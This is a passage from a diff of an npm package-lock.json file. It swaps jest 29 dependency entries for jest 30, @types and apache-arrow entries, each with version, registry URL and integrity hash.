"^2.0.3" + "tslib": "^2.8.0" } }, - "jest-mock": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.6.1.tgz", - "integrity": "sha512-brovyV9HBkjXAEdRooaTQK42n8usKoSRR3gihzUpYeV/vwqgSoNfrksO7UfSACnPmxasO/8TmHM3w9Hp3G1dgw==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-util": "^29.6.1" - } + "@types/command-line-args": { + "version": "5.2.3", + "resolved": "https://registry.npmjs.org/@types/command-line-args/-/command-line-args-5.2.3.tgz", + "integrity": "sha512-uv0aG6R0Y8WHZLTamZwtfsDLVRnOa+n+n5rEvFWL5Na5gZ8V2Teab/duDPFzIIIhs9qizDpcavCusCLJZu62Kw==" }, - "jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "requires": {} + "@types/command-line-usage": { + "version": "5.0.4", + "resolved": "https://registry.npmjs.org/@types/command-line-usage/-/command-line-usage-5.0.4.tgz", + "integrity": "sha512-BwR5KP3Es/CSht0xqBcUXS3qCAUVXwpRKsV2+arxeb65atasuXG9LykC9Ab10Cw3s2raH92ZqOeILaQbsB2ACg==" }, - "jest-regex-util": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.4.3.tgz", - "integrity": "sha512-O4FglZaMmWXbGHSQInfXewIsd1LMn9p3ZXB/6r4FOkyhX2/iP/soMG98jGvk/A3HAN78+5VWcBGO0BJAPRh4kg==", + "@types/istanbul-lib-coverage": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.6.tgz", + "integrity": "sha512-2QF/t/auWm0lsy8XtKVPG19v3sSOQlJe/YHZgfjb/KBBHOGSV+J2q/S671rcq9uTBrLAXmZpqJiaQbMT+zNU1w==", "dev": true }, - "jest-resolve": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.6.1.tgz", - "integrity": "sha512-AeRkyS8g37UyJiP9w3mmI/VXU/q8l/IH52vj/cDAyScDcemRbSBhfX/NMYIGilQgSVwsjxrCHf3XJu4f+lxCMg==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - } - }, - "jest-resolve-dependencies": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.6.1.tgz", - "integrity": "sha512-BbFvxLXtcldaFOhNMXmHRWx1nXQO5LoXiKSGQcA1LxxirYceZT6ch8KTE1bK3X31TNG/JbkI7OkS/ABexVahiw==", - "dev": true, - "requires": { - "jest-regex-util": "^29.4.3", - "jest-snapshot": "^29.6.1" - } - }, - "jest-runner": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.6.1.tgz", - "integrity": "sha512-tw0wb2Q9yhjAQ2w8rHRDxteryyIck7gIzQE4Reu3JuOBpGp96xWgF0nY8MDdejzrLCZKDcp8JlZrBN/EtkQvPQ==", + "@types/istanbul-lib-report": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", + "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", "dev": true, "requires": { - "@jest/console": "^29.6.1", - "@jest/environment": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.4.3", - "jest-environment-node": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-leak-detector": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-resolve": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-util": "^29.6.1", - "jest-watcher": "^29.6.1", - "jest-worker": "^29.6.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" + "@types/istanbul-lib-coverage": "*" } }, - "jest-runtime": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.6.1.tgz", - "integrity": "sha512-D6/AYOA+Lhs5e5il8+5pSLemjtJezUr+8zx+Sn8xlmOux3XOqx4d8l/2udBea8CRPqqrzhsKUsN/gBDE/IcaPQ==", + "@types/istanbul-reports": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.4.tgz", + "integrity": "sha512-pk2B1NWalF9toCRu6gjBzR69syFjP4Od8WRAX+0mmf9lAjCRicLOWc+ZrxZHx/0XRjotgkF9t6iaMJ+aXcOdZQ==", "dev": true, "requires": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/globals": "^29.6.1", - "@jest/source-map": "^29.6.0", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" + "@types/istanbul-lib-report": "*" } }, - "jest-snapshot": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.6.1.tgz", - "integrity": "sha512-G4UQE1QQ6OaCgfY+A0uR1W2AY0tGXUPQpoUClhWHq1Xdnx1H6JOrC2nH5lqnOEqaDgbHFgIwZ7bNq24HpB180A==", + "@types/jest": { + "version": "30.0.0", + "resolved": "https://registry.npmjs.org/@types/jest/-/jest-30.0.0.tgz", + "integrity": "sha512-XTYugzhuwqWjws0CVz8QpM36+T+Dz5mTEBKhNs/esGLnCIlGdRy+Dq78NRjd7ls7r8BC8ZRMOrKlkO1hU0JOwA==", "dev": true, "requires": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.6.1", - "semver": "^7.5.3" + "expect": "^30.0.0", + "pretty-format": "^30.0.0" }, "dependencies": { - "lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "@jest/expect-utils": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-30.0.4.tgz", + "integrity": "sha512-EgXecHDNfANeqOkcak0DxsoVI4qkDUsR7n/Lr2vtmTBjwLPBnnPOF71S11Q8IObWzxm2QgQoY6f9hzrRD3gHRA==", + "dev": true, + "requires": { + "@jest/get-type": "30.0.1" + } + }, + "@jest/schemas": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-30.0.1.tgz", + "integrity": "sha512-+g/1TKjFuGrf1Hh0QPCv0gISwBxJ+MQSNXmG9zjHy7BmFhtoJ9fdNhWJp3qUKRi93AOZHXtdxZgJ1vAtz6z65w==", "dev": true, "requires": { - "yallist": "^4.0.0" + "@sinclair/typebox": "^0.34.0" } }, - "semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "@jest/types": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/types/-/types-30.0.1.tgz", + "integrity": "sha512-HGwoYRVF0QSKJu1ZQX0o5ZrUrrhj0aOOFA8hXrumD7SIzjouevhawbTjmXdwOmURdGluU9DM/XvGm3NyFoiQjw==", "dev": true, "requires": { - "lru-cache": "^6.0.0" + "@jest/pattern": "30.0.1", + "@jest/schemas": "30.0.1", + "@types/istanbul-lib-coverage": "^2.0.6", + "@types/istanbul-reports": "^3.0.4", + "@types/node": "*", + "@types/yargs": "^17.0.33", + "chalk": "^4.1.2" } }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", + "@sinclair/typebox": { + "version": "0.34.37", + "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.34.37.tgz", + "integrity": "sha512-2TRuQVgQYfy+EzHRTIvkhv2ADEouJ2xNS/Vq+W5EuuewBdOrvATvljZTxHWZSTYr2sTjTHpGvucaGAt67S2akw==", "dev": true - } - } - }, - "jest-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.6.1.tgz", - "integrity": "sha512-NRFCcjc+/uO3ijUVyNOQJluf8PtGCe/W6cix36+M3cTFgiYqFOOW5MgN4JOOcvbUhcKTYVd1CvHz/LWi8d16Mg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - } - }, - "jest-validate": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.6.1.tgz", - "integrity": "sha512-r3Ds69/0KCN4vx4sYAbGL1EVpZ7MSS0vLmd3gV78O+NAx3PDQQukRU5hNHPXlyqCgFY8XUk7EuTMLugh0KzahA==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "leven": "^3.1.0", - "pretty-format": "^29.6.1" - }, - "dependencies": { - "camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", + }, + "ansi-styles": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", + "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", "dev": true - } - } - }, - "jest-watcher": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.6.1.tgz", - "integrity": "sha512-d4wpjWTS7HEZPaaj8m36QiaP856JthRZkrgcIY/7ISoUWPIillrXM23WPboZVLbiwZBt4/qn2Jke84Sla6JhFA==", - "dev": true, - "requires": { - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.6.1", - "string-length": "^4.0.1" - } - }, - "jest-worker": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.6.1.tgz", - "integrity": "sha512-U+Wrbca7S8ZAxAe9L6nb6g8kPdia5hj32Puu5iOqBCMTMWFHXuK6dOV2IFrpedbTV8fjMFLdWNttQTBL6u2MRA==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.6.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "dependencies": { - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", + }, + "ci-info": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-4.3.0.tgz", + "integrity": "sha512-l+2bNRMiQgcfILUi33labAZYIWlH1kWDp+ecNo5iisRKrbm0xcRyCww71/YU0Fkw0mAFpz9bJayXPjey6vkmaQ==", + "dev": true + }, + "expect": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/expect/-/expect-30.0.4.tgz", + "integrity": "sha512-dDLGjnP2cKbEppxVICxI/Uf4YemmGMPNy0QytCbfafbpYk9AFQsxb8Uyrxii0RPK7FWgLGlSem+07WirwS3cFQ==", + "dev": true, + "requires": { + "@jest/expect-utils": "30.0.4", + "@jest/get-type": "30.0.1", + "jest-matcher-utils": "30.0.4", + "jest-message-util": "30.0.2", + "jest-mock": "30.0.2", + "jest-util": "30.0.2" + } + }, + "jest-diff": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-30.0.4.tgz", + "integrity": "sha512-TSjceIf6797jyd+R64NXqicttROD+Qf98fex7CowmlSn7f8+En0da1Dglwr1AXxDtVizoxXYZBlUQwNhoOXkNw==", + "dev": true, + "requires": { + "@jest/diff-sequences": "30.0.1", + "@jest/get-type": "30.0.1", + "chalk": "^4.1.2", + "pretty-format": "30.0.2" + } + }, + "jest-matcher-utils": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-30.0.4.tgz", + "integrity": "sha512-ubCewJ54YzeAZ2JeHHGVoU+eDIpQFsfPQs0xURPWoNiO42LGJ+QGgfSf+hFIRplkZDkhH5MOvuxHKXRTUU3dUQ==", + "dev": true, + "requires": { + "@jest/get-type": "30.0.1", + "chalk": "^4.1.2", + "jest-diff": "30.0.4", + "pretty-format": "30.0.2" + } + }, + "jest-message-util": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-30.0.2.tgz", + "integrity": "sha512-vXywcxmr0SsKXF/bAD7t7nMamRvPuJkras00gqYeB1V0WllxZrbZ0paRr3XqpFU2sYYjD0qAaG2fRyn/CGZ0aw==", + "dev": true, + "requires": { + "@babel/code-frame": "^7.27.1", + "@jest/types": "30.0.1", + "@types/stack-utils": "^2.0.3", + "chalk": "^4.1.2", + "graceful-fs": "^4.2.11", + "micromatch": "^4.0.8", + "pretty-format": "30.0.2", + "slash": "^3.0.0", + "stack-utils": "^2.0.6" + } + }, + "jest-mock": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-30.0.2.tgz", + "integrity": "sha512-PnZOHmqup/9cT/y+pXIVbbi8ID6U1XHRmbvR7MvUy4SLqhCbwpkmXhLbsWbGewHrV5x/1bF7YDjs+x24/QSvFA==", + "dev": true, + "requires": { + "@jest/types": "30.0.1", + "@types/node": "*", + "jest-util": "30.0.2" + } + }, + "jest-util": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-30.0.2.tgz", + "integrity": "sha512-8IyqfKS4MqprBuUpZNlFB5l+WFehc8bfCe1HSZFHzft2mOuND8Cvi9r1musli+u6F3TqanCZ/Ik4H4pXUolZIg==", + "dev": true, + "requires": { + "@jest/types": "30.0.1", + "@types/node": "*", + "chalk": "^4.1.2", + "ci-info": "^4.2.0", + "graceful-fs": "^4.2.11", + "picomatch": "^4.0.2" + } + }, + "picomatch": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.2.tgz", + "integrity": "sha512-M7BAV6Rlcy5u+m6oPhAPFgJTzAioX/6B0DxyvDlo9l8+T3nLKbrczg2WLUyzd45L8RqfUMyGPzekbMvX2Ldkwg==", + "dev": true + }, + "pretty-format": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-30.0.2.tgz", + "integrity": "sha512-yC5/EBSOrTtqhCKfLHqoUIAXVRZnukHPwWBJWR7h84Q3Be1DRQZLncwcfLoPA5RPQ65qfiCMqgYwdUuQ//eVpg==", "dev": true, "requires": { - "has-flag": "^4.0.0" + "@jest/schemas": "30.0.1", + "ansi-styles": "^5.2.0", + "react-is": "^18.3.1" } } } }, - "js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, + "@types/node": { + "version": "20.17.46", + "resolved": "https://registry.npmjs.org/@types/node/-/node-20.17.46.tgz", + "integrity": "sha512-0PQHLhZPWOxGW4auogW0eOQAuNIlCYvibIpG67ja0TOJ6/sehu+1en7sfceUn+QQtx4Rk3GxbLNwPh0Cav7TWw==", "requires": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" + "undici-types": "~6.19.2" } }, - "jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true - }, - "json-bignum": { - "version": "0.0.3", - "resolved": "https://registry.npmjs.org/json-bignum/-/json-bignum-0.0.3.tgz", - "integrity": "sha512-2WHyXj3OfHSgNyuzDbSxI1w2jgw5gkWSWhS7Qg4bWXx1nLk3jnbwfUeS0PSba3IzpTUWdHxBieELUzXRjQB2zg==" - }, - "json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true - }, - "kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true - }, - "leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true - }, - "lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", + "@types/stack-utils": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.3.tgz", + "integrity": "sha512-9aEbYZ3TbYMznPdcdr3SmIrLXwC/AKZXQeCf9Pgao5CKb8CyHuEX5jzWPTkvregvhRJHcpRO6BFoGW9ycaOkYw==", "dev": true }, - "locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "requires": { - "p-locate": "^4.1.0" - } - }, - "lodash.camelcase": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/lodash.camelcase/-/lodash.camelcase-4.3.0.tgz", - "integrity": "sha512-TwuEnCnxbc3rAvhf/LbG7tJUDzhqXyFnv3dtzLOPgCG/hODL7WFnsbwktkD7yUV0RrreP/l1PALq/YSg6VvjlA==" - }, - "lodash.chunk": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/lodash.chunk/-/lodash.chunk-4.2.0.tgz", - "integrity": "sha512-ZzydJKfUHJwHa+hF5X66zLFCBrWn5GeF28OHEr4WVWtNDXlQ/IjWKPBiikqKo2ne0+v6JgCgJ0GzJp8k8bHC7w==" - }, - "lodash.flatmap": { - "version": "4.5.0", - "resolved": "https://registry.npmjs.org/lodash.flatmap/-/lodash.flatmap-4.5.0.tgz", - "integrity": "sha512-/OcpcAGWlrZyoHGeHh3cAoa6nGdX6QYtmzNP84Jqol6UEQQ2gIaU3H+0eICcjcKGl0/XF8LWOujNn9lffsnaOg==" - }, - "lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", + "@types/yargs": { + "version": "17.0.33", + "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.33.tgz", + "integrity": "sha512-WpxBCKWPLr4xSsHgz511rFJAM+wS28w2zEO1QDNY5zM/S8ok70NNfztH0xwhqKyaK0OHCbN98LDAZuy1ctxDkA==", "dev": true, "requires": { - "yallist": "^3.0.2" + "@types/yargs-parser": "*" } }, - "luxon": { - "version": "3.6.1", - "resolved": "https://registry.npmjs.org/luxon/-/luxon-3.6.1.tgz", - "integrity": "sha512-tJLxrKJhO2ukZ5z0gyjY1zPh3Rh88Ej9P7jNrZiHMUXHae1yvI2imgOZtL1TO8TW6biMMKfTtAOoEJANgtWBMQ==" - }, - "make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dev": true, - "requires": { - "semver": "^6.0.0" - } + "@types/yargs-parser": { + "version": "21.0.0", + "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", + "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", + "dev": true }, - "makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, + "ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", "requires": { - "tmpl": "1.0.5" + "color-convert": "^2.0.1" } }, - "merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, + "apache-arrow": { + "version": "19.0.1", + "resolved": "https://registry.npmjs.org/apache-arrow/-/apache-arrow-19.0.1.tgz", + "integrity": "sha512-APmMLzS4qbTivLrPdQXexGM4JRr+0g62QDaobzEvip/FdQIrv2qLy0mD5Qdmw4buydtVJgbFeKR8f59I6PPGDg==", "requires": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" + "@swc/helpers": "^0.5.11", + "@types/command-line-args": "^5.2.3", + "@types/command-line-usage": "^5.0.4", + "@types/node": "^20.13.0", + "command-line-args": "^6.0.1", + "command-line-usage": "^7.0.1", + "flatbuffers": "^24.3.25", + "json-bignum": "^0.0.3", + "tslib": "^2.6.2" } }, - "mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true + "array-back": { + "version": "6.2.2", + "resolved": "https://registry.npmjs.org/array-back/-/array-back-6.2.2.tgz", + "integrity": "sha512-gUAZ7HPyb4SJczXAMUXMGAvI976JoK3qEx9v1FTmeYuJj0IBiaKttG1ydtGKdkfqWkIkouke7nG8ufGy77+Cvw==" }, - "minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", + "braces": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", + "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", "dev": true, "requires": { - "brace-expansion": "^1.1.7" + "fill-range": "^7.1.1" } }, - "ms": { - "version": "2.1.3", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", - "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==" - }, - "natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node-releases": { - "version": "2.0.13", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.13.tgz", - "integrity": "sha512-uYr7J37ae/ORWdZeQ1xxMJe3NtdmqMC/JZK+geofDrkLUApKRHPd18/TxtBOJ4A0/+uUIliorNrfYV6s1b02eQ==", - "dev": true - }, - "normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true + "chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "requires": { + "ansi-styles": 